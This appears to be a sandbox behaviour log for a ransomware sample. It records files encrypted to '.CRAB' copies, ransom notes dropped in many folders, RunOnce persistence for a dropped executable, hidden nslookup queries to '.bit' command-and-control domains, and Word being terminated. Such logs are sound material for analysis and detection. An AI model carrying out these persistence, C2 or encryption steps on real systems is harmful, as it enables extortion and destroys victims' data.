Read C:\588bce7c90097ed212\2070\LocalizedData.xml.CRAB size = 1048576, size_out = 80254 True 1
Fn
Data
Read C:\588bce7c90097ed212\3076\eula.rtf.CRAB size = 1048576, size_out = 6309 True 1
Fn
Data
Read C:\588bce7c90097ed212\3076\LocalizedData.xml.CRAB size = 1048576, size_out = 60816 True 1
Fn
Data
Read C:\588bce7c90097ed212\3082\eula.rtf.CRAB size = 1048576, size_out = 3069 True 1
Fn
Data
Read C:\588bce7c90097ed212\3082\LocalizedData.xml.CRAB size = 1048576, size_out = 79996 True 1
Fn
Data
Read C:\588bce7c90097ed212\Client\Parameterinfo.xml.CRAB size = 1048576, size_out = 201796 True 1
Fn
Data
Read C:\588bce7c90097ed212\Client\UiInfo.xml.CRAB size = 1048576, size_out = 39042 True 1
Fn
Data
Read C:\588bce7c90097ed212\DHtmlHeader.html.CRAB size = 1048576, size_out = 16118 True 1
Fn
Data
Read C:\588bce7c90097ed212\Extended\Parameterinfo.xml.CRAB size = 1048576, size_out = 93314 True 1
Fn
Data
Read C:\588bce7c90097ed212\Extended\UiInfo.xml.CRAB size = 1048576, size_out = 39050 True 1
Fn
Data
Read C:\588bce7c90097ed212\header.bmp.CRAB size = 1048576, size_out = 3628 True 1
Fn
Data
Read C:\588bce7c90097ed212\netfx_Core.mzz.CRAB size = 1048576, size_out = 1048576 True 37
Fn
Data
Write C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe size = 261128 True 1
Fn
Data
Write C:\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\$GetCurrent\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\$GetCurrent\Logs\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log.CRAB size = 42688 True 1
Fn
Data
Write C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log.CRAB size = 256 True 2
Fn
Data
Write C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log.CRAB size = 8 True 1
Fn
Data
Write C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log.CRAB size = 6016 True 1
Fn
Data
Write C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log.CRAB size = 256 True 2
Fn
Data
Write C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log.CRAB size = 8 True 1
Fn
Data
Write C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log.CRAB size = 48 True 1
Fn
Data
Write C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log.CRAB size = 256 True 2
Fn
Data
Write C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log.CRAB size = 8 True 1
Fn
Data
Write C:\$GetCurrent\SafeOS\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\$GetCurrent\SafeOS\GetCurrentRollback.ini.CRAB size = 160 True 1
Fn
Data
Write C:\$GetCurrent\SafeOS\GetCurrentRollback.ini.CRAB size = 256 True 2
Fn
Data
Write C:\$GetCurrent\SafeOS\GetCurrentRollback.ini.CRAB size = 8 True 1
Fn
Data
Write C:\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1025\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1025\eula.rtf.CRAB size = 7568 True 1
Fn
Data
Write C:\588bce7c90097ed212\1025\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1025\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1025\LocalizedData.xml.CRAB size = 74224 True 1
Fn
Data
Write C:\588bce7c90097ed212\1025\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1025\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1028\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1028\eula.rtf.CRAB size = 6320 True 1
Fn
Data
Write C:\588bce7c90097ed212\1028\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1028\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1028\LocalizedData.xml.CRAB size = 60816 True 1
Fn
Data
Write C:\588bce7c90097ed212\1028\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1028\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1029\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1029\eula.rtf.CRAB size = 3728 True 1
Fn
Data
Write C:\588bce7c90097ed212\1029\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1029\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1029\LocalizedData.xml.CRAB size = 80976 True 1
Fn
Data
Write C:\588bce7c90097ed212\1029\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1029\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1030\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1030\eula.rtf.CRAB size = 3328 True 1
Fn
Data
Write C:\588bce7c90097ed212\1030\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1030\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1030\LocalizedData.xml.CRAB size = 77760 True 1
Fn
Data
Write C:\588bce7c90097ed212\1030\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1030\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1031\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1031\eula.rtf.CRAB size = 3424 True 1
Fn
Data
Write C:\588bce7c90097ed212\1031\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1031\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1031\LocalizedData.xml.CRAB size = 82352 True 1
Fn
Data
Write C:\588bce7c90097ed212\1031\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1031\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1032\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1032\eula.rtf.CRAB size = 8880 True 1
Fn
Data
Write C:\588bce7c90097ed212\1032\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1032\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1032\LocalizedData.xml.CRAB size = 86288 True 1
Fn
Data
Write C:\588bce7c90097ed212\1032\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1032\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1033\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1033\eula.rtf.CRAB size = 3200 True 1
Fn
Data
Write C:\588bce7c90097ed212\1033\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1033\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1033\LocalizedData.xml.CRAB size = 77232 True 1
Fn
Data
Write C:\588bce7c90097ed212\1033\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1033\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1035\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1035\eula.rtf.CRAB size = 3712 True 1
Fn
Data
Write C:\588bce7c90097ed212\1035\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1035\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1035\LocalizedData.xml.CRAB size = 77024 True 1
Fn
Data
Write C:\588bce7c90097ed212\1035\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1035\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1036\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1036\eula.rtf.CRAB size = 3536 True 1
Fn
Data
Write C:\588bce7c90097ed212\1036\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1036\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1036\LocalizedData.xml.CRAB size = 82976 True 1
Fn
Data
Write C:\588bce7c90097ed212\1036\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1036\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1037\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1037\eula.rtf.CRAB size = 6864 True 1
Fn
Data
Write C:\588bce7c90097ed212\1037\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1037\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1037\LocalizedData.xml.CRAB size = 72080 True 1
Fn
Data
Write C:\588bce7c90097ed212\1037\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1037\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1038\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1038\eula.rtf.CRAB size = 4256 True 1
Fn
Data
Write C:\588bce7c90097ed212\1038\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1038\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1038\LocalizedData.xml.CRAB size = 86448 True 1
Fn
Data
Write C:\588bce7c90097ed212\1038\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1038\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1040\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1040\eula.rtf.CRAB size = 3648 True 1
Fn
Data
Write C:\588bce7c90097ed212\1040\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1040\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1040\LocalizedData.xml.CRAB size = 80064 True 1
Fn
Data
Write C:\588bce7c90097ed212\1040\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1040\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1041\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1041\eula.rtf.CRAB size = 10128 True 1
Fn
Data
Write C:\588bce7c90097ed212\1041\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1041\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1041\LocalizedData.xml.CRAB size = 68240 True 1
Fn
Data
Write C:\588bce7c90097ed212\1041\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1041\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1042\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1042\eula.rtf.CRAB size = 12688 True 1
Fn
Data
Write C:\588bce7c90097ed212\1042\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1042\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1042\LocalizedData.xml.CRAB size = 65248 True 1
Fn
Data
Write C:\588bce7c90097ed212\1042\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1042\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1043\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1043\eula.rtf.CRAB size = 3552 True 1
Fn
Data
Write C:\588bce7c90097ed212\1043\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1043\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1043\LocalizedData.xml.CRAB size = 79648 True 1
Fn
Data
Write C:\588bce7c90097ed212\1043\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1043\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1044\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1044\eula.rtf.CRAB size = 3056 True 1
Fn
Data
Write C:\588bce7c90097ed212\1044\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1044\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1044\LocalizedData.xml.CRAB size = 79296 True 1
Fn
Data
Write C:\588bce7c90097ed212\1044\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1044\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1045\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1045\eula.rtf.CRAB size = 4048 True 1
Fn
Data
Write C:\588bce7c90097ed212\1045\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1045\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1045\LocalizedData.xml.CRAB size = 82384 True 1
Fn
Data
Write C:\588bce7c90097ed212\1045\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1045\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1046\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1046\eula.rtf.CRAB size = 3696 True 1
Fn
Data
Write C:\588bce7c90097ed212\1046\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1046\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1046\LocalizedData.xml.CRAB size = 80752 True 1
Fn
Data
Write C:\588bce7c90097ed212\1046\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1046\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1049\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1049\eula.rtf.CRAB size = 54464 True 1
Fn
Data
Write C:\588bce7c90097ed212\1049\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1049\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1049\LocalizedData.xml.CRAB size = 81488 True 1
Fn
Data
Write C:\588bce7c90097ed212\1049\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1049\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1053\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1053\eula.rtf.CRAB size = 3872 True 1
Fn
Data
Write C:\588bce7c90097ed212\1053\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1053\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1053\LocalizedData.xml.CRAB size = 77680 True 1
Fn
Data
Write C:\588bce7c90097ed212\1053\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1053\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1055\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\1055\eula.rtf.CRAB size = 3872 True 1
Fn
Data
Write C:\588bce7c90097ed212\1055\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1055\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\1055\LocalizedData.xml.CRAB size = 76832 True 1
Fn
Data
Write C:\588bce7c90097ed212\1055\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\1055\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\2052\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\2052\eula.rtf.CRAB size = 5840 True 1
Fn
Data
Write C:\588bce7c90097ed212\2052\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\2052\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\2052\LocalizedData.xml.CRAB size = 60688 True 1
Fn
Data
Write C:\588bce7c90097ed212\2052\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\2052\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\2070\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\2070\eula.rtf.CRAB size = 4016 True 1
Fn
Data
Write C:\588bce7c90097ed212\2070\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\2070\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\2070\LocalizedData.xml.CRAB size = 80256 True 1
Fn
Data
Write C:\588bce7c90097ed212\2070\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\2070\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\3076\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\3076\eula.rtf.CRAB size = 6320 True 1
Fn
Data
Write C:\588bce7c90097ed212\3076\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\3076\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\3076\LocalizedData.xml.CRAB size = 60816 True 1
Fn
Data
Write C:\588bce7c90097ed212\3076\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\3076\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\3082\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\3082\eula.rtf.CRAB size = 3072 True 1
Fn
Data
Write C:\588bce7c90097ed212\3082\eula.rtf.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\3082\eula.rtf.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\3082\LocalizedData.xml.CRAB size = 80000 True 1
Fn
Data
Write C:\588bce7c90097ed212\3082\LocalizedData.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\3082\LocalizedData.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\Client\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\Client\Parameterinfo.xml.CRAB size = 201808 True 1
Fn
Data
Write C:\588bce7c90097ed212\Client\Parameterinfo.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\Client\Parameterinfo.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\Client\UiInfo.xml.CRAB size = 39056 True 1
Fn
Data
Write C:\588bce7c90097ed212\Client\UiInfo.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\Client\UiInfo.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\DHtmlHeader.html.CRAB size = 16128 True 1
Fn
Data
Write C:\588bce7c90097ed212\DHtmlHeader.html.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\DHtmlHeader.html.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\Extended\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\Extended\Parameterinfo.xml.CRAB size = 93328 True 1
Fn
Data
Write C:\588bce7c90097ed212\Extended\Parameterinfo.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\Extended\Parameterinfo.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\Extended\UiInfo.xml.CRAB size = 39056 True 1
Fn
Data
Write C:\588bce7c90097ed212\Extended\UiInfo.xml.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\Extended\UiInfo.xml.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\Graphics\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Data
Write C:\588bce7c90097ed212\header.bmp.CRAB size = 3632 True 1
Fn
Data
Write C:\588bce7c90097ed212\header.bmp.CRAB size = 256 True 2
Fn
Data
Write C:\588bce7c90097ed212\header.bmp.CRAB size = 8 True 1
Fn
Data
Write C:\588bce7c90097ed212\netfx_Core.mzz.CRAB size = 1048576 True 36
Fn
Data
Registry (28)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = dfmazirmvok, data = "C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe", size = 108, type = REG_SZ True 1
Fn
Process (4)
»
Operation Process Additional Information Success Count Logfile
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0xdec, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup ransomware.bit ns2.corp-servers.ru os_pid = 0x10f4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Open c:\program files\microsoft office\root\office16\winword.exe desired_access = PROCESS_TERMINATE True 1
Fn
Terminate c:\program files\microsoft office\root\office16\winword.exe exit_code = 0 True 1
Fn
Module (512)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x75490000 True 1
Fn
Load KERNEL32.dll base_address = 0x75490000 True 2
Fn
Load USER32.dll base_address = 0x75a80000 True 2
Fn
Load ntdll.dll base_address = 0x774a0000 True 1
Fn
Load msvcr100.dll base_address = 0x73d50000 True 1
Fn
Load GDI32.dll base_address = 0x73f90000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76cf0000 True 1
Fn
Load SHELL32.dll base_address = 0x74140000 True 1
Fn
Load CRYPT32.dll base_address = 0x76b60000 True 1
Fn
Load WININET.dll base_address = 0x73a80000 True 1
Fn
Load PSAPI.DLL base_address = 0x73fc0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75490000 True 3
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x774a0000 True 5
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76cf0000 True 125
Fn
Get Filename - process_name = c:\users\fd1hvy\appdata\local\temp\phfw.exe, file_name_orig = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\fd1hvy\appdata\local\temp\phfw.exe, file_name_orig = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 256 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x754a4ae0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x754a4b20 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x754a4b40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x754a4b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x754a5a80 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x754a6970 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x754a6a30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x754a69d0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x754a56d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x754a67e0 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x754a3cb0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x754a5cc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x754a6760 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x754fef10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x754a5090 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x754fed10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x77506390 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x754a6c70 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x754a5010 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x754a51b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x754feab0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x754ff130 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x754a6620 True 1
Fn
